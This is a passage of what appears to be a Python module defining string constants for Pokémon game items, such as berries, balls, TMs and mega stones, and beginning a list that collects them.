'Focus_Sash'\r\nFLAME_ORB = 'Flame_Orb'\r\nTOXIC_ORB = 'Toxic_Orb'\r\nSTICKY_BARB = 'Sticky_Barb'\r\nIRON_BALL = 'Iron_Ball'\r\nRING_TARGET = 'Ring_Target'\r\nMACHO_BRACE = 'Macho_Brace'\r\nPOWER_WEIGHT = 'Power_Weight'\r\nPOWER_BRACER = 'Power_Bracer'\r\nPOWER_BELT = 'Power_Belt'\r\nPOWER_LENS = 'Power_Lens'\r\nPOWER_BAND = 'Power_Band'\r\nPOWER_ANKLET = 'Power_Anklet'\r\nLAX_INCENSE = 'Lax_Incense'\r\nFULL_INCENSE = 'Full_Incense'\r\nLUCK_INCENSE = 'Luck_Incense'\r\nPURE_INCENSE = 'Pure_Incense'\r\nSEA_INCENSE = 'Sea_Incense'\r\nWAVE_INCENSE = 'Wave_Incense'\r\nROSE_INCENSE = 'Rose_Incense'\r\nODD_INCENSE = 'Odd_Incense'\r\nROCK_INCENSE = 'Rock_Incense'\r\nCHARCOAL = 'Charcoal'\r\nMYSTIC_WATER = 'Mystic_Water'\r\nMAGNET = 'Magnet'\r\nMIRACLE_SEED = 'Miracle_Seed'\r\nNEVER_MELT_ICE = 'Never_Melt_Ice'\r\nBLACK_BELT = 'Black_Belt'\r\nPOISON_BARB = 'Poison_Barb'\r\nSOFT_SAND = 'Soft_Sand'\r\nSHARP_BEAK = 'Sharp_Beak'\r\nTWISTED_SPOON = 'Twisted_Spoon'\r\nSILVER_POWDER = 'Silver_Powder'\r\nHARD_STONE = 'Hard_Stone'\r\nSPELL_TAG = 'Spell_Tag'\r\nDRAGON_FANG = 'Dragon_Fang'\r\nBLACK_GLASSES = 'Black_Glasses'\r\nMETAL_COAT = 'Metal_Coat'\r\nSILK_SCARF = 'Silk_Scarf'\r\nFLAME_PLATE = 'Flame_Plate'\r\nSPLASH_PLATE = 'Splash_Plate'\r\nZAP_PLATE = 'Zap_Plate'\r\nMEADOW_PLATE = 'Meadow_Plate'\r\nICICLE_PLATE = 'Icicle_Plate'\r\nFIST_PLATE = 'Fist_Plate'\r\nTOXIC_PLATE = 'Toxic_Plate'\r\nEARTH_PLATE = 'Earth_Plate'\r\nSKY_PLATE = 'Sky_Plate'\r\nMIND_PLATE = 'Mind_Plate'\r\nINSECT_PLATE = 'Insect_Plate'\r\nSTONE_PLATE = 'Stone_Plate'\r\nSPOOKY_PLATE = 'Spooky_Plate'\r\nDRACO_PLATE = 'Draco_Plate'\r\nDREAD_PLATE = 'Dread_Plate'\r\nIRON_PLATE = 'Iron_Plate'\r\nFIRE_GEM = 'Fire_Gem'\r\nWATER_GEM = 'Water_Gem'\r\nELECTRIC_GEM = 'Electric_Gem'\r\nGRASS_GEM = 'Grass_Gem'\r\nICE_GEM = 'Ice_Gem'\r\nFIGHTING_GEM = 'Fighting_Gem'\r\nPOISON_GEM = 'Poison_Gem'\r\nGROUND_GEM = 'Ground_Gem'\r\nFLYING_GEM = 'Flying_Gem'\r\nPSYCHIC_GEM = 'Psychic_Gem'\r\nBUG_GEM = 'Bug_Gem'\r\nROCK_GEM = 'Rock_Gem'\r\nGHOST_GEM = 'Ghost_Gem'\r\nDRAGON_GEM = 'Dragon_Gem'\r\nDARK_GEM = 'Dark_Gem'\r\nSTEEL_GEM = 'Steel_Gem'\r\nNORMAL_GEM = 'Normal_Gem'\r\nLIGHT_BALL = 'Light_Ball'\r\nLUCKY_PUNCH = 'Lucky_Punch'\r\nMETAL_POWDER = 'Metal_Powder'\r\nQUICK_POWDER = 'Quick_Powder'\r\nTHICK_CLUB = 'Thick_Club'\r\nSTICK = 'Stick'\r\nSOUL_DEW = 'Soul_Dew'\r\nDEEP_SEA_TOOTH = 'Deep_Sea_Tooth'\r\nDEEP_SEA_SCALE = 'Deep_Sea_Scale'\r\nADAMANT_ORB = 'Adamant_Orb'\r\nLUSTROUS_ORB = 'Lustrous_Orb'\r\nGRISEOUS_ORB = 'Griseous_Orb'\r\nDOUSE_DRIVE = 'Douse_Drive'\r\nSHOCK_DRIVE = 'Shock_Drive'\r\nBURN_DRIVE = 'Burn_Drive'\r\nCHILL_DRIVE = 'Chill_Drive'\r\nEVERSTONE = 'Everstone'\r\nDRAGON_SCALE = 'Dragon_Scale'\r\nUPGRADE = 'Upgrade'\r\nDUBIOUS_DISC = 'Dubious_Disc'\r\nPROTECTOR = 'Protector'\r\nELECTIRIZER = 'Electirizer'\r\nMAGMARIZER = 'Magmarizer'\r\nREAPER_CLOTH = 'Reaper_Cloth'\r\nPRISM_SCALE = 'Prism_Scale'\r\nOVAL_STONE = 'Oval_Stone'\r\nRED_SCARF = 'Red_Scarf'\r\nBLUE_SCARF = 'Blue_Scarf'\r\nPINK_SCARF = 'Pink_Scarf'\r\nGREEN_SCARF = 'Green_Scarf'\r\nYELLOW_SCARF = 'Yellow_Scarf'\r\nPOTION = 'Potion'\r\nSUPER_POTION = 'Super_Potion'\r\nHYPER_POTION = 'Hyper_Potion'\r\nMAX_POTION = 'Max_Potion'\r\nFULL_RESTORE = 'Full_Restore'\r\nSACRED_ASH = 'Sacred_Ash'\r\nAWAKENING = 'Awakening'\r\nANTIDOTE = 'Antidote'\r\nBURN_HEAL = 'Burn_Heal'\r\nPARALYZE_HEAL = 'Paralyze_Heal'\r\nICE_HEAL = 'Ice_Heal'\r\nFULL_HEAL = 'Full_Heal'\r\nLAVA_COOKIE = 'Lava_Cookie'\r\nOLD_GATEAU = 'Old_Gateau'\r\nCASTELIACONE = 'Casteliacone'\r\nREVIVE = 'Revive'\r\nMAX_REVIVE = 'Max_Revive'\r\nBERRY_JUICE = 'Berry_Juice'\r\nRAGE_CANDY_BAR = 'Rage_Candy_Bar'\r\nSWEET_HEART = 'Sweet_Heart'\r\nFRESH_WATER = 'Fresh_Water'\r\nSODA_POP = 'Soda_Pop'\r\nLEMONADE = 'Lemonade'\r\nMOOMOO_MILK = 'Moomoo_Milk'\r\nENERGY_POWDER = 'Energy_Powder'\r\nENERGY_ROOT = 'Energy_Root'\r\nHEAL_POWDER = 'Heal_Powder'\r\nREVIVAL_HERB = 'Revival_Herb'\r\nETHER = 'Ether'\r\nMAX_ETHER = 'Max_Ether'\r\nELIXIR = 'Elixir'\r\nMAX_ELIXIR = 'Max_Elixir'\r\nPP_UP = 'PP_Up'\r\nPP_MAX = 'PP_Max'\r\nHP_UP = 'HP_Up'\r\nPROTEIN = 'Protein'\r\nIRON = 'Iron'\r\nCALCIUM = 'Calcium'\r\nZINC = 'Zinc'\r\nCARBOS = 'Carbos'\r\nHEALTH_WING = 'Health_Wing'\r\nMUSCLE_WING = 'Muscle_Wing'\r\nRESIST_WING = 'Resist_Wing'\r\nGENIUS_WING = 'Genius_Wing'\r\nCLEVER_WING = 'Clever_Wing'\r\nSWIFT_WING = 'Swift_Wing'\r\nRARE_CANDY = 'Rare_Candy'\r\nMASTER_BALL = 'Master_Ball'\r\nULTRA_BALL = 'Ultra_Ball'\r\nGREAT_BALL = 'Great_Ball'\r\nPOKE_BALL = 'Poke_Ball'\r\nSAFARI_BALL = 'Safari_Ball'\r\nSPORT_BALL = 'Sport_Ball'\r\nNET_BALL = 'Net_Ball'\r\nDIVE_BALL = 'Dive_Ball'\r\nNEST_BALL = 'Nest_Ball'\r\nREPEAT_BALL = 'Repeat_Ball'\r\nTIMER_BALL = 'Timer_Ball'\r\nLUXURY_BALL = 'Luxury_Ball'\r\nPREMIER_BALL = 'Premier_Ball'\r\nDUSK_BALL = 'Dusk_Ball'\r\nHEAL_BALL = 'Heal_Ball'\r\nQUICK_BALL = 'Quick_Ball'\r\nCHERISH_BALL = 'Cherish_Ball'\r\nFAST_BALL = 'Fast_Ball'\r\nLEVEL_BALL = 'Level_Ball'\r\nLURE_BALL = 'Lure_Ball'\r\nHEAVY_BALL = 'Heavy_Ball'\r\nLOVE_BALL = 'Love_Ball'\r\nFRIEND_BALL = 'Friend_Ball'\r\nMOON_BALL = 'Moon_Ball'\r\nTM01 = 'TM01'\r\nTM02 = 'TM02'\r\nTM03 = 'TM03'\r\nTM04 = 'TM04'\r\nTM05 = 'TM05'\r\nTM06 = 'TM06'\r\nTM07 = 'TM07'\r\nTM08 = 'TM08'\r\nTM09 = 'TM09'\r\nTM10 = 'TM10'\r\nTM11 = 'TM11'\r\nTM12 = 'TM12'\r\nTM13 = 'TM13'\r\nTM14 = 'TM14'\r\nTM15 = 'TM15'\r\nTM16 = 'TM16'\r\nTM17 = 'TM17'\r\nTM18 = 'TM18'\r\nTM19 = 'TM19'\r\nTM20 = 'TM20'\r\nTM21 = 'TM21'\r\nTM22 = 'TM22'\r\nTM23 = 'TM23'\r\nTM24 = 'TM24'\r\nTM25 = 'TM25'\r\nTM26 = 'TM26'\r\nTM27 = 'TM27'\r\nTM28 = 'TM28'\r\nTM29 = 'TM29'\r\nTM30 = 'TM30'\r\nTM31 = 'TM31'\r\nTM32 = 'TM32'\r\nTM33 = 'TM33'\r\nTM34 = 'TM34'\r\nTM35 = 'TM35'\r\nTM36 = 'TM36'\r\nTM37 = 'TM37'\r\nTM38 = 'TM38'\r\nTM39 = 'TM39'\r\nTM40 = 'TM40'\r\nTM41 = 'TM41'\r\nTM42 = 'TM42'\r\nTM43 = 'TM43'\r\nTM44 = 'TM44'\r\nTM45 = 'TM45'\r\nTM46 = 'TM46'\r\nTM47 = 'TM47'\r\nTM48 = 'TM48'\r\nTM49 = 'TM49'\r\nTM50 = 'TM50'\r\nTM51 = 'TM51'\r\nTM52 = 'TM52'\r\nTM53 = 'TM53'\r\nTM54 = 'TM54'\r\nTM55 = 'TM55'\r\nTM56 = 'TM56'\r\nTM57 = 'TM57'\r\nTM58 = 'TM58'\r\nTM59 = 'TM59'\r\nTM60 = 'TM60'\r\nTM61 = 'TM61'\r\nTM62 = 'TM62'\r\nTM63 = 'TM63'\r\nTM64 = 'TM64'\r\nTM65 = 'TM65'\r\nTM66 = 'TM66'\r\nTM67 = 'TM67'\r\nTM68 = 'TM68'\r\nTM69 = 'TM69'\r\nTM70 = 'TM70'\r\nTM71 = 'TM71'\r\nTM72 = 'TM72'\r\nTM73 = 'TM73'\r\nTM74 = 'TM74'\r\nTM75 = 'TM75'\r\nTM76 = 'TM76'\r\nTM77 = 'TM77'\r\nTM78 = 'TM78'\r\nTM79 = 'TM79'\r\nTM80 = 'TM80'\r\nTM81 = 'TM81'\r\nTM82 = 'TM82'\r\nTM83 = 'TM83'\r\nTM84 = 'TM84'\r\nTM85 = 'TM85'\r\nTM86 = 'TM86'\r\nTM87 = 'TM87'\r\nTM88 = 'TM88'\r\nTM89 = 'TM89'\r\nTM90 = 'TM90'\r\nTM91 = 'TM91'\r\nTM92 = 'TM92'\r\nTM93 = 'TM93'\r\nTM94 = 'TM94'\r\nTM95 = 'TM95'\r\nHM01 = 'HM01'\r\nHM02 = 'HM02'\r\nHM03 = 'HM03'\r\nHM04 = 'HM04'\r\nHM05 = 'HM05'\r\nHM06 = 'HM06'\r\nCHERI_BERRY = 'Cheri_Berry'\r\nCHESTO_BERRY = 'Chesto_Berry'\r\nPECHA_BERRY = 'Pecha_Berry'\r\nRAWST_BERRY = 'Rawst_Berry'\r\nASPEAR_BERRY = 'Aspear_Berry'\r\nLEPPA_BERRY = 'Leppa_Berry'\r\nORAN_BERRY = 'Oran_Berry'\r\nPERSIM_BERRY = 'Persim_Berry'\r\nLUM_BERRY = 'Lum_Berry'\r\nSITRUS_BERRY = 'Sitrus_Berry'\r\nFIGY_BERRY = 'Figy_Berry'\r\nWIKI_BERRY = 'Wiki_Berry'\r\nMAGO_BERRY = 'Mago_Berry'\r\nAGUAV_BERRY = 'Aguav_Berry'\r\nIAPAPA_BERRY = 'Iapapa_Berry'\r\nRAZZ_BERRY = 'Razz_Berry'\r\nBLUK_BERRY = 'Bluk_Berry'\r\nNANAB_BERRY = 'Nanab_Berry'\r\nWEPEAR_BERRY = 'Wepear_Berry'\r\nPINAP_BERRY = 'Pinap_Berry'\r\nPOMEG_BERRY = 'Pomeg_Berry'\r\nKELPSY_BERRY = 'Kelpsy_Berry'\r\nQUALOT_BERRY = 'Qualot_Berry'\r\nHONDEW_BERRY = 'Hondew_Berry'\r\nGREPA_BERRY = 'Grepa_Berry'\r\nTAMATO_BERRY = 'Tamato_Berry'\r\nCORNN_BERRY = 'Cornn_Berry'\r\nMAGOST_BERRY = 'Magost_Berry'\r\nRABUTA_BERRY = 'Rabuta_Berry'\r\nNOMEL_BERRY = 'Nomel_Berry'\r\nSPELON_BERRY = 'Spelon_Berry'\r\nPAMTRE_BERRY = 'Pamtre_Berry'\r\nWATMEL_BERRY = 'Watmel_Berry'\r\nDURIN_BERRY = 'Durin_Berry'\r\nBELUE_BERRY = 'Belue_Berry'\r\nOCCA_BERRY = 'Occa_Berry'\r\nPASSHO_BERRY = 'Passho_Berry'\r\nWACAN_BERRY = 'Wacan_Berry'\r\nRINDO_BERRY = 'Rindo_Berry'\r\nYACHE_BERRY = 'Yache_Berry'\r\nCHOPLE_BERRY = 'Chople_Berry'\r\nKEBIA_BERRY = 'Kebia_Berry'\r\nSHUCA_BERRY = 'Shuca_Berry'\r\nCOBA_BERRY = 'Coba_Berry'\r\nPAYAPA_BERRY = 'Payapa_Berry'\r\nTANGA_BERRY = 'Tanga_Berry'\r\nCHARTI_BERRY = 'Charti_Berry'\r\nKASIB_BERRY = 'Kasib_Berry'\r\nHABAN_BERRY = 'Haban_Berry'\r\nCOLBUR_BERRY = 'Colbur_Berry'\r\nBABIRI_BERRY = 'Babiri_Berry'\r\nCHILAN_BERRY = 'Chilan_Berry'\r\nLIECHI_BERRY = 'Liechi_Berry'\r\nGANLON_BERRY = 'Ganlon_Berry'\r\nSALAC_BERRY = 'Salac_Berry'\r\nPETAYA_BERRY = 'Petaya_Berry'\r\nAPICOT_BERRY = 'Apicot_Berry'\r\nLANSAT_BERRY = 'Lansat_Berry'\r\nSTARF_BERRY = 'Starf_Berry'\r\nENIGMA_BERRY = 'Enigma_Berry'\r\nMICLE_BERRY = 'Micle_Berry'\r\nCUSTAP_BERRY = 'Custap_Berry'\r\nJABOCA_BERRY = 'Jaboca_Berry'\r\nROWAP_BERRY = 'Rowap_Berry'\r\nGRASS_MAIL = 'Grass_Mail'\r\nFLAME_MAIL = 'Flame_Mail'\r\nBUBBLE_MAIL = 'Bubble_Mail'\r\nBLOOM_MAIL = 'Bloom_Mail'\r\nTUNNEL_MAIL = 'Tunnel_Mail'\r\nSTEEL_MAIL = 'Steel_Mail'\r\nHEART_MAIL = 'Heart_Mail'\r\nSNOW_MAIL = 'Snow_Mail'\r\nSPACE_MAIL = 'Space_Mail'\r\nAIR_MAIL = 'Air_Mail'\r\nMOSAIC_MAIL = 'Mosaic_Mail'\r\nBRICK_MAIL = 'Brick_Mail'\r\nX_ATTACK = 'X_Attack'\r\nX_ATTACK_2 = 'X_Attack_2'\r\nX_ATTACK_3 = 'X_Attack_3'\r\nX_ATTACK_6 = 'X_Attack_6'\r\nX_DEFENSE = 'X_Defense'\r\nX_DEFENSE_2 = 'X_Defense_2'\r\nX_DEFENSE_3 = 'X_Defense_3'\r\nX_DEFENSE_6 = 'X_Defense_6'\r\nX_SP_ATK = 'X_Sp_Atk'\r\nX_SP_ATK_2 = 'X_Sp_Atk_2'\r\nX_SP_ATK_3 = 'X_Sp_Atk_3'\r\nX_SP_ATK_6 = 'X_Sp_Atk_6'\r\nX_SP_DEF = 'X_Sp_Def'\r\nX_SP_DEF_2 = 'X_Sp_Def_2'\r\nX_SP_DEF_3 = 'X_Sp_Def_3'\r\nX_SP_DEF_6 = 'X_Sp_Def_6'\r\nX_SPEED = 'X_Speed'\r\nX_SPEED_2 = 'X_Speed_2'\r\nX_SPEED_3 = 'X_Speed_3'\r\nX_SPEED_6 = 'X_Speed_6'\r\nX_ACCURACY = 'X_Accuracy'\r\nX_ACCURACY_2 = 'X_Accuracy_2'\r\nX_ACCURACY_3 = 'X_Accuracy_3'\r\nX_ACCURACY_6 = 'X_Accuracy_6'\r\nDIRE_HIT = 'Dire_Hit'\r\nDIRE_HIT_2 = 'Dire_Hit_2'\r\nDIRE_HIT_3 = 'Dire_Hit_3'\r\nGUARD_SPEC = 'Guard_Spec'\r\nRESET_URGE = 'Reset_Urge'\r\nABILITY_URGE = 'Ability_Urge'\r\nITEM_URGE = 'Item_Urge'\r\nITEM_DROP = 'Item_Drop'\r\nBLUE_FLUTE = 'Blue_Flute'\r\nYELLOW_FLUTE = 'Yellow_Flute'\r\nRED_FLUTE = 'Red_Flute'\r\nPOKE_DOLL = 'Poke_Doll'\r\nFLUFFY_TAIL = 'Fluffy_Tail'\r\nPOKE_TOY = 'Poke_Toy'\r\nBICYCLE = 'Bicycle'\r\nOLD_ROD = 'Old_Rod'\r\nGOOD_ROD = 'Good_Rod'\r\nSUPER_ROD = 'Super_Rod'\r\nITEMFINDER = 'Itemfinder'\r\nDOWSING_MACHINE = 'Dowsing_Machine'\r\nPOKE_RADAR = 'Poke_Radar'\r\nTOWN_MAP = 'Town_Map'\r\nPOKE_FLUTE = 'Poke_Flute'\r\nCOIN_CASE = 'Coin_Case'\r\nSOOT_SACK = 'Soot_Sack'\r\nSILPH_SCOPE = 'Silph_Scope'\r\nDEVON_SCOPE = 'Devon_Scope'\r\nSQUIRT_BOTTLE = 'Squirt_Bottle'\r\nSPRAYDUCK = 'Sprayduck'\r\nWAILMER_PAIL = 'Wailmer_Pail'\r\nGRACIDEA = 'Gracidea'\r\nAURORA_TICKET = 'Aurora_Ticket'\r\nOLD_SEA_MAP = 'Old_Sea_Map'\r\nDNA_SPLICERS = 'DNA_Splicers'\r\nREVEAL_GLASS = 'Reveal_Glass'\r\nOVAL_CHARM = 'Oval_Charm'\r\nSHINY_CHARM = 'Shiny_Charm'\r\nICE_STONE = 'Ice_Stone'\r\nJAW_FOSSIL = 'Jaw_Fossil'\r\nSAIL_FOSSIL = 'Sail_Fossil'\r\nRED_NECTAR = 'Red_Nectar'\r\nYELLOW_NECTAR = 'Yellow_Nectar'\r\nPINK_NECTAR = 'Pink_Nectar'\r\nPURPLE_NECTAR = 'Purple_Nectar'\r\nASSAULT_VEST = 'Assault_Vest'\r\nSAFETY_GOGGLES = 'Safety_Goggles'\r\nPROTECTIVE_PADS = 'Protective_Pads'\r\nTERRAIN_EXTENDER = 'Terrain_Extender'\r\nELECTRIC_SEED = 'Electric_Seed'\r\nPSYCHIC_SEED = 'Psychic_Seed'\r\nMISTY_SEED = 'Misty_Seed'\r\nGRASSY_SEED = 'Grassy_Seed'\r\nLUMINOUS_MOSS = 'Luminous_Moss'\r\nSNOWBALL = 'Snowball'\r\nWEAKNESS_POLICY = 'Weakness_Policy'\r\nADRENALINE_ORB = 'Adrenaline_Orb'\r\nPIXIE_PLATE = 'Pixie_Plate'\r\nFAIRY_GEM = 'Fairy_Gem'\r\nFIRE_MEMORY = 'Fire_Memory'\r\nWATER_MEMORY = 'Water_Memory'\r\nELECTRIC_MEMORY = 'Electric_Memory'\r\nGRASS_MEMORY = 'Grass_Memory'\r\nICE_MEMORY = 'Ice_Memory'\r\nFIGHTING_MEMORY = 'Fighting_Memory'\r\nPOISON_MEMORY = 'Poison_Memory'\r\nGROUND_MEMORY = 'Ground_Memory'\r\nFLYING_MEMORY = 'Flying_Memory'\r\nPSYCHIC_MEMORY = 'Psychic_Memory'\r\nBUG_MEMORY = 'Bug_Memory'\r\nROCK_MEMORY = 'Rock_Memory'\r\nGHOST_MEMORY = 'Ghost_Memory'\r\nDRAGON_MEMORY = 'Dragon_Memory'\r\nDARK_MEMORY = 'Dark_Memory'\r\nSTEEL_MEMORY = 'Steel_Memory'\r\nFAIRY_MEMORY = 'Fairy_Memory'\r\nVENUSAURITE = 'Venusaurite'\r\nCHARIZARDITE_X = 'Charizardite_X'\r\nCHARIZARDITE_Y = 'Charizardite_Y'\r\nBLASTOISINITE = 'Blastoisinite'\r\nBEEDRILLITE = 'Beedrillite'\r\nPIDGEOTITE = 'Pidgeotite'\r\nALAKAZITE = 'Alakazite'\r\nSLOWBRONITE = 'Slowbronite'\r\nGENGARITE = 'Gengarite'\r\nKANGASKHANITE = 'Kangaskhanite'\r\nPINSIRITE = 'Pinsirite'\r\nGYARADOSITE = 'Gyaradosite'\r\nAERODACTYLITE = 'Aerodactylite'\r\nMEWTWONITE_X = 'Mewtwonite_X'\r\nMEWTWONITE_Y = 'Mewtwonite_Y'\r\nAMPHAROSITE = 'Ampharosite'\r\nSTEELIXITE = 'Steelixite'\r\nSCIZORITE = 'Scizorite'\r\nHERACRONITE = 'Heracronite'\r\nHOUNDOOMINITE = 'Houndoominite'\r\nTYRANITARITE = 'Tyranitarite'\r\nSCEPTILITE = 'Sceptilite'\r\nBLAZIKENITE = 'Blazikenite'\r\nSWAMPERTITE = 'Swampertite'\r\nGARDEVOIRITE = 'Gardevoirite'\r\nSABLENITE = 'Sablenite'\r\nMAWILITE = 'Mawilite'\r\nAGGRONITE = 'Aggronite'\r\nMEDICHAMITE = 'Medichamite'\r\nMANECTITE = 'Manectite'\r\nSHARPEDONITE = 'Sharpedonite'\r\nCAMERUPTITE = 'Cameruptite'\r\nALTARIANITE = 'Altarianite'\r\nBANETTITE = 'Banettite'\r\nABSOLITE = 'Absolite'\r\nGLALITITE = 'Glalitite'\r\nSALAMENCITE = 'Salamencite'\r\nMETAGROSSITE = 'Metagrossite'\r\nLATIASITE = 'Latiasite'\r\nLATIOSITE = 'Latiosite'\r\nLOPUNNITE = 'Lopunnite'\r\nGARCHOMPITE = 'Garchompite'\r\nLUCARIONITE = 'Lucarionite'\r\nABOMASITE = 'Abomasite'\r\nGALLADITE = 'Galladite'\r\nAUDINITE = 'Audinite'\r\nDIANCITE = 'Diancite'\r\nRED_ORB = 'Red_Orb'\r\nBLUE_ORB = 'Blue_Orb'\r\nWHIPPED_DREAM = 'Whipped_Dream'\r\nSACHET = 'Sachet'\r\nLUMIOSE_GALETTE = 'Lumiose_Galette'\r\nSHALOUR_SABLE = 'Shalour_Sable'\r\nBIG_MALASADA = 'Big_Malasada'\r\nABILITY_CAPSULE = 'Ability_Capsule'\r\nDREAM_BALL = 'Dream_Ball'\r\nBEAST_BALL = 'Beast_Ball'\r\nTM96 = 'TM96'\r\nTM97 = 'TM97'\r\nTM98 = 'TM98'\r\nTM99 = 'TM99'\r\nTM100 = 'TM100'\r\nROSELI_BERRY = 'Roseli_Berry'\r\nKEE_BERRY = 'Kee_Berry'\r\nMARANGA_BERRY = 'Maranga_Berry'\r\nSPRINKLOTAD = 'Sprinklotad'\r\nPRISON_BOTTLE = 'Prison_Bottle'\r\nN_SOLARIZER = 'N_Solarizer'\r\nN_LUNARIZER = 'N_Lunarizer'\r\nMEGA_RING = 'Mega_Ring'\r\n\r\nITEMS = [REPEL, SUPER_REPEL, MAX_REPEL, BLACK_FLUTE, WHITE_FLUTE, HONEY, ESCAPE_ROPE, RED_SHARD, YELLOW_SHARD,\r\n BLUE_SHARD, GREEN_SHARD, FIRE_STONE, THUNDER_STONE, WATER_STONE, LEAF_STONE, MOON_STONE, SUN_STONE, DUSK_STONE,\r\n DAWN_STONE, SHINY_STONE, RED_APRICORN, YELLOW_APRICORN, BLUE_APRICORN, GREEN_APRICORN, PINK_APRICORN,\r\n WHITE_APRICORN, BLACK_APRICORN, HELIX_FOSSIL, DOME_FOSSIL, OLD_AMBER, ROOT_FOSSIL, CLAW_FOSSIL, SKULL_FOSSIL,\r\n ARMOR_FOSSIL, COVER_FOSSIL, PLUME_FOSSIL, PRETTY_WING, TINY_MUSHROOM, BIG_MUSHROOM, BALM_MUSHROOM, PEARL,\r\n BIG_PEARL, PEARL_STRING, STARDUST, STAR_PIECE, COMET_SHARD, NUGGET, BIG_NUGGET, HEART_SCALE, SLOWPOKE_TAIL,\r\n RARE_BONE, RELIC_COPPER, RELIC_SILVER, RELIC_GOLD, RELIC_VASE, RELIC_BAND, RELIC_STATUE, RELIC_CROWN,\r\n GROWTH_MULCH, DAMP_MULCH, STABLE_MULCH, GOOEY_MULCH, SHOAL_SALT, SHOAL_SHELL, ODD_KEYSTONE, AIR_BALLOON,\r\n BRIGHT_POWDER, EVIOLITE, FLOAT_STONE, DESTINY_KNOT, ROCKY_HELMET, EJECT_BUTTON, RED_CARD, SHED_SHELL,\r\n SMOKE_BALL, LUCKY_EGG, EXP_SHARE, AMULET_COIN, SOOTHE_BELL, CLEANSE_TAG, CHOICE_BAND, CHOICE_SPECS,\r\n CHOICE_SCARF, HEAT_ROCK, DAMP_ROCK, SMOOTH_ROCK, ICY_ROCK, LIGHT_CLAY, GRIP_CLAW, BINDING_BAND, BIG_ROOT,\r\n BLACK_SLUDGE, LEFTOVERS, SHELL_BELL, MENTAL_HERB, WHITE_HERB, POWER_HERB, ABSORB_BULB, CELL_BATTERY, LIFE_ORB,\r\n EXPERT_BELT, METRONOME, MUSCLE_BAND, WISE_GLASSES, RAZOR_CLAW, SCOPE_LENS, WIDE_LENS, ZOOM_LENS, KINGS_ROCK,\r\n RAZOR_FANG, LAGGING_TAIL, QUICK_CLAW, FOCUS_BAND, FOCUS_SASH, FLAME_ORB, TOXIC_ORB, STICKY_BARB, IRON_BALL,\r\n RING_TARGET, MACHO_BRACE, POWER_WEIGHT, POWER_BRACER, POWER_BELT, POWER_LENS, POWER_BAND, POWER_ANKLET,\r\n LAX_INCENSE, FULL_INCENSE, LUCK_INCENSE, PURE_INCENSE, SEA_INCENSE, WAVE_INCENSE, ROSE_INCENSE, ODD_INCENSE,\r\n ROCK_INCENSE, CHARCOAL, MYSTIC_WATER, MAGNET, MIRACLE_SEED, NEVER_MELT_ICE, BLACK_BELT, POISON_BARB, SOFT_SAND,\r\n SHARP_BEAK, TWISTED_SPOON, SILVER_POWDER, HARD_STONE, SPELL_TAG, DRAGON_FANG, BLACK_GLASSES, METAL_COAT,\r\n SILK_SCARF, FLAME_PLATE, SPLASH_PLATE, ZAP_PLATE, MEADOW_PLATE, ICICLE_PLATE, FIST_PLATE, TOXIC_PLATE,\r\n EARTH_PLATE, SKY_PLATE, MIND_PLATE, INSECT_PLATE, STONE_PLATE, SPOOKY_PLATE, DRACO_PLATE, DREAD_PLATE,\r\n IRON_PLATE, FIRE_GEM, WATER_GEM, ELECTRIC_GEM, GRASS_GEM, ICE_GEM, FIGHTING_GEM, POISON_GEM, GROUND_GEM,\r\n FLYING_GEM, PSYCHIC_GEM, BUG_GEM, ROCK_GEM, GHOST_GEM, DRAGON_GEM, DARK_GEM, STEEL_GEM, NORMAL_GEM, LIGHT_BALL,\r\n LUCKY_PUNCH, METAL_POWDER, QUICK_POWDER, THICK_CLUB, STICK, SOUL_DEW, DEEP_SEA_TOOTH, DEEP_SEA_SCALE,\r\n ADAMANT_ORB, LUSTROUS_ORB, GRISEOUS_ORB, DOUSE_DRIVE, SHOCK_DRIVE, BURN_DRIVE, CHILL_DRIVE, EVERSTONE,\r\n DRAGON_SCALE, UPGRADE, DUBIOUS_DISC, PROTECTOR, ELECTIRIZER, MAGMARIZER, REAPER_CLOTH, PRISM_SCALE, OVAL_STONE,\r\n RED_SCARF, BLUE_SCARF, PINK_SCARF, GREEN_SCARF, YELLOW_SCARF, POTION, SUPER_POTION, HYPER_POTION, MAX_POTION,\r\n FULL_RESTORE, SACRED_ASH, AWAKENING, ANTIDOTE, BURN_HEAL, PARALYZE_HEAL, ICE_HEAL, FULL_HEAL, LAVA_COOKIE,\r\n OLD_GATEAU, CASTELIACONE, REVIVE, MAX_REVIVE, BERRY_JUICE, RAGE_CANDY_BAR, SWEET_HEART, FRESH_WATER, SODA_POP,\r\n LEMONADE, MOOMOO_MILK, ENERGY_POWDER, ENERGY_ROOT, HEAL_POWDER, REVIVAL_HERB, ETHER, MAX_ETHER, ELIXIR,\r\n MAX_ELIXIR, PP_UP, PP_MAX, HP_UP, PROTEIN, IRON, CALCIUM, ZINC, CARBOS, HEALTH_WING, MUSCLE_WING, RESIST_WING,\r\n GENIUS_WING, CLEVER_WING, SWIFT_WING, RARE_CANDY, MASTER_BALL, ULTRA_BALL, GREAT_BALL, POKE_BALL, SAFARI_BALL,\r\n SPORT_BALL, NET_BALL, DIVE_BALL, NEST_BALL, REPEAT_BALL, TIMER_BALL, LUXURY_BALL, PREMIER_BALL, DUSK_BALL,\r\n HEAL_BALL, QUICK_BALL, CHERISH_BALL, FAST_BALL, LEVEL_BALL, LURE_BALL, HEAVY_BALL, LOVE_BALL, FRIEND_BALL,\r\n MOON_BALL, TM01, TM02, TM03, TM04, TM05, TM06, TM07, TM08, TM09, TM10, TM11, TM12, TM13, TM14, TM15, TM16,\r\n TM17, TM18, TM19, TM20, TM21, TM22, TM23, TM24, TM25, TM26, TM27, TM28, TM29, TM30, TM31, TM32, TM33, TM34,\r\n TM35, TM36, TM37, TM38, TM39, TM40, TM41, TM42, TM43, TM44, TM45, TM46, TM47, TM48, TM49, TM50, TM51, TM52,\r\n TM53, TM54, TM55, TM56, TM57, TM58, TM59, TM60, TM61, TM62, TM63, TM64, TM65, TM66, TM67, TM68, TM69, TM70,\r\n TM71, TM72, TM73, TM74, TM75, TM76, TM77, TM78, TM79, TM80, TM81, TM82, TM83, TM84, TM85, TM86, TM87, TM88,\r\n TM89, TM90, TM91, TM92, TM93, TM94, TM95, HM01, HM02, HM03, HM04, HM05, HM06, CHERI_BERRY, CHESTO_BERRY,\r\n PECHA_BERRY, RAWST_BERRY, ASPEAR_BERRY, LEPPA_BERRY, ORAN_BERRY, PERSIM_BERRY, LUM_BERRY, SITRUS_BERRY,\r\n FIGY_BERRY, WIKI_BERRY, MAGO_BERRY, AGUAV_BERRY, IAPAPA_BERRY, RAZZ_BERRY, BLUK_BERRY, NANAB_BERRY,\r\n 